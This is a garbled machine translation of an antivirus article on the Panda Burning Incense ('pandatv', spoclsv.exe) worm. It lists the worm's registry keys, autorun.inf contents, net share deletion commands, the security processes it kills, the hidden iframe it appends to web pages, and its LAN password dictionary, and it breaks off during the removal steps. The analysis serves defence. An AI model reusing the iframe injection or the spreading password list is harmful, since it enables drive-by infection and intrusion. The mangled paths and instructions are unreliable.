Pandatv virus exclusive and manual repair solutions

Editor's note:This article describes the methods for killing pandatv and pandatv variants, and the manual removal of pandatv. The virus paths include spoclsv.exeand fuckjacks.exe variants, and the pandatv virus killing tool.

We strongly recommend that you pay attention to the following four points before killing pandatv:

• 1. This article includesDescription of the two pandatv variantsCheck the virus symptoms and select different methods for virus detection and removal.
• 2.for the. exe Executable File infected with the burning virus of the Bear Cat, we recommend that youBack up and fix!
• 3.Retrieve the ghost (. gho) File deleted by pandatvFor more information, see!
• 4. If you do not know much about computers, please clear the pandatv virus with expert guidance.

Pandatv Virus Variant 1: The virus takes effect in spoclsv.exe"

This is one of the early variants of pandatv, particularly"Killing antivirus software", The worst thing is thatInfected full-disk .exe FileAndDelete the. gho File(Ghost image file ).

One of the most inspirational moves isAdd a piece of code at the end of all htm/html/asp/php/jsp/aspx files to call the virus. Currently, all the exclusive killing tools and anti-virus software do not fix the virus. You need to manually clear the code for virus addition and be sure to clear it. Otherwise, the webpage with this code will be infected again.

The other older "pandatv" spoclsv variants have fewer virus behavior than this version. It will not be listed separately.

　　Virus description:

"Wuhan boys", also known as "pandatv incense", is an infectious worm that can infect files such as exe, com, pif, src, html, and asp in the system.Abort a large number of anti-virus software processesAndDelete a file with the extension gho,(. Gho is a GHOST backup file. All the. exe executable files in the infected user system were changed to the pandatv with three incense points.

Pandatv (non-source image)

Infected Program (actual diagram)

The following are detailed behaviors and Solutions of pandatv:

　　Detailed behavior of pandatv virus:

1. copy itself to the system directory:

Using systemdrivers driversspoclsv.exe ("% System %" indicates the directory of Windows, for example, C: Windows)

Different spoclsv.exe variants can have different directories. For example, the variant directory that broke out in December is: C: WINDOWSSystem32Driversspoclsv.exe.

2. Create a startup Item:

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
"Svcshare" = "Your systempolicdriversspoclsv.exe"

3. Generate a virus copy in the root directory of each partition:
X: setup.exe
X: autorun. inf

Autorun. inf content:

[AutoRun]
Open‑setup.exe
Shellexecuteappssetup.exe
ShellAutocommand=setup.exe

4. Use the net share command to disable Management Sharing:

Cmd.exe/c net share X $/del/y
Cmd.exe/c net share admin $/del/y

5. Modify "show all files and folders:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerAdvancedFolderHiddenSHOWALL]
"CheckedValue" = dword: 00000000

6. Try to close the security software window for pandatv:

Skynet
Firewall
Process
VirusScan
NOD32
Netscape
Anti-Virus
Drug overlord
Rising
Jiang min
Huang shanie
Super Rabbit
Master of Optimization
Mmaqando
Moma scavenger
QQ Virus
Registry Editor
System Configuration Utility
Kaspersky Anti-Virus
Symantec AntiVirus
Duba
Windows Task Manager
Esteem procs
Green e PC
Password theft
PHG
Trojan helper Finder
System Safety Monitor
Wrapped gift Killer
Winsock Expert
Game Trojan Detection master
Super patrol
Msctls_statusbar32
Pjf (ustc)
IceSword

7. Try to end security software-related processes and Viking virus processes:

Mcshield.exe
VsTskMgr.exe
NaPrdMgr.exe
UpdaterUI.exe
TBMon.exe
Scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP. kxp
KvMonXP. kxp
KVCenter. kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie. kxp
FrogAgent.exe
Logocmd.exe
Logo_1.exe
Rundl132.exe

8. disable security software services:

Schedule
Sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
Kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
Navapsvc
Wscsvc
KPfwSvc
SNDSrvc
CcProxy
CcEvtMgr
CcSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc

9. Delete startup items related to security software:

SOFTWAREMicrosoftWindowsCurrentVersionRunRavTask
SOFTWAREMicrosoftWindowsCurrentVersionRunKvMonXP
SOFTWAREMicrosoftWindowsCurrentVersionRunkav
SOFTWAREMicrosoftWindowsCurrentVersionRunKAVPersonal50
SOFTWAREMicrosoftWindowsCurrentVersionRunMcAfeeUpdaterUI
SOFTWAREMicrosoftWindowsCurrentVersionRunNetwork Associates Error Reporting Service
SOFTWAREMicrosoftWindowsCurrentVersionRunShStatEXE
SOFTWAREMicrosoftWindowsCurrentVersionRunYLive.exe
Softwaremicrosoftwindowscurrentversionrunysponse

10. traverse the directory and modify the htm/html/asp/php/jsp/aspx and other webpage files. append information to the end of these files:

<Iframe src = "hxxp: // www.ctv163.com/wuhan/down.htm" width = "0" height = "0" frameborder = "0"> </iframe>

But do not modify the webpage files in the following directory:

C: WINDOWS
C: WINNT
C: system32
C: Documents and Settings
C: System Volume Information
C: Recycled
Program FilesWindows NT
Program FilesWindowsUpdate
Program FilesWindows Media Player
Program FilesOutlook Express
Program FilesInternet Explorer
Program FilesNetMeeting
Program FilesCommon Files
Program FilesComPlus Applications
Program FilesMessenger
Program FilesInstallShield Installation Information
Program FilesMSN
Program FilesMicrosoft Frontpage
Program FilesMovie Maker
Program FilesMSN Gamin Zone

11. Generate the Desktop _. ini file in the accessed directory. The content is the current date.

12. In addition, the virus will try to delete the GHO file.

The virus also tries to copy a weak password to another computer in the LAN using the name of gamesetup.exe:
Password
Harley
Golf
Pussy
Mustang
Shadow
Fish
Qwerty
Baseball
Letmein
Ccc
Admin
Abc
Pass
Passwd
Database
Abcd
Abc123
Sybase
123qwe
Server
Computer
Super
123asd
Ihavenopass
Godblessyou
Enable
Alpha
1234 qwer
123abc
Aaa
Patrick
Pat
Administrator
Root
Sex
God
Fuckyou
Fuck
Test
Test123
Temp
Temp123
Win
Asdf
Pwd
Qwer
Yxcv
Zxcv
Home
Xxx
Owner
Login
Login
Love
Mypc
Mypc123
Admin123
Mypass
Mypass123
Administrator
Guest
Admin
Root

　　The virus file contains the following information:

Whboy
* ** Wu * Han * Male * Health * Touch * down * Zai * Persons ***

Solution:

1. Stop the virus process:

%Systempolicdriversspoclsv.exe

Different spoclsv.exe variants can have different directories. For example, the variant directory that broke out in December is: C: WINDOWSSystem32Driversspoclsv.exe. But this method can be used to clear.

Zookeeper system1_system32spoclsv.exe "is a system file. (Currently, no variants inserted into the system process do not seem to rule out variants .)

When spoclsv.exe is run before, use the Super Rabbit magic settings.

2. delete a virus file:

<